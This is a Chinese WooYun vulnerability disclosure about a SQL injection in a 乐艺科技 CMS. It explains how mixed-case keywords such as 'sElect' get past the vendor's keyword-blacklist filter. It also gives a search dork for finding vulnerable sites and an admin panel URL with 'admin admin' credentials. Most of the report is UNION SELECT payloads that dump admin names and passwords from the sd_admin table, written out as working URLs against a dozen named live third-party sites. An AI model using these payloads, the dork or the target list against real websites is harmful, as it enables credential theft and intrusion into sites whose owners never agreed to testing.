漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-083409
漏洞标题:某通用CMS存在sql注射(轻松绕过防注入+官网复现)
相关厂商:乐艺科技
漏洞作者: 郭斯特
提交时间:2014-11-18 10:57
修复时间:2015-02-16 10:58
公开时间:2015-02-16 10:58
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-02-16: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT~
可union~
详细说明:
技术支持:乐艺科技inurl:about.asp?ncid=
漏洞参数:ncid=
about.asp?ncid=
case_show.asp?ncid=
exp1:union sElect 1,title,3,pass,5,6,7,8,9,10,11,12,13 from sd_admin
exp2:case_show.asp?ncid=56 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from sd_admin
系统自带防御脚本
conn.asp
<!--#include file="lesiure/check.asp"-->
<%
dim sql_injdata,SQL_inj,SQL_Get,SQL_Data,Sql_Post
SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|chr|mid|master|truncate|char|declare|-1"
SQL_inj = split(SQL_Injdata,"|")
If Request.QueryString<>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
Response.Write "<Script Language=javascript>alert('注意:请不要提交非法请求!');history.back(-1)</Script>"
Response.end
end if
next
Next
End If
If Request.Form<>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
Response.Write "<Script Language=javascript>alert('注意:请不要提交非法请求!');history.back(-1)</Script>"
Response.end
end if
next
next
end if
%>
<%
set conn=Server.CreateObject("Adodb.Connection")
set rs=Server.CreateObject("Adodb.RecordSet")
dim dbpath 'the database path
dbpath=server.mappath("data/web.mdb")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&dbpath
conn.Open connstr
%>
<%
dim company_keyword,company_content,company_name,company_Boss,company_telephone,company_tell,company_fax,company_Email,company_http,company_qq,company_address,company_icp
set rs=conn.execute("select * from sd_company_info")
if not rs.eof then
company_content=rs("content")
company_keyword=rs("keyword")
company_name=rs("company")
company_Boss=rs("Boss")
company_telephone=rs("telephone")
company_tell=rs("tell")
company_fax=rs("fax")
company_Email=rs("Email")
company_http=rs("http")
company_qq=rs("qq")
company_address=rs("address")
company_icp=rs("icp")
end if
rs.close
set rs=nothing
%>
官网http://www.lerye.cn/case_show.asp?ncid=56
防注入
此时我们将敏感语句换成大写就可以轻松绕过。这种情况在我测试很多cms都存在。
这种防注入脚本基本没用啊...
http://www.lerye.cn/case_show.asp?ncid=56 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from sd_admin
admin admin
http://www.lerye.cn/lesiure/admin_index.asp
http://wst090.com/case_show.asp?ncid=30%20union%20sElect%201,title,3,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20sd_admin
漏洞证明:
http://www.jsyl155.com/about.asp?ncid=1%20union%20sElect%201,title,3,pass,5,6,7,8,9,10,11,12,13%20from%20sd_admin
http://www.cipon.net/about.asp?ncid=2 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12,13 from sd_admin
http://www.mogold.com.cn/about.asp?ncid=2 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12 from sd_admin
http://www.jsyl155.com/about.asp?ncid=4 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12,13 from sd_admin
http://www.sdyt531.com/about.asp?ncid=3 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12,13 from sd_admin
http://gssscale.w137.mc-test.com/about.asp?ncid=7 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12 from sd_admin
http://www.bsjsjtx.com/about.asp?ncid=2 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12,13 from sd_admin
http://www.txsbsjsj.com/about.asp?ncid=2 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12,13 from sd_admin
http://www.asieris.cn/about.asp?ncid=2 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12,13 from sd_admin
http://euweili.w28.mc-test.com//about.asp?ncid=2 union sElect 1,title,3,pass,5,6,7,8,9,10,11,12 from sd_admin
and so on
修复方案:
过滤吧
版权声明:转载请注明来源 郭斯特@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝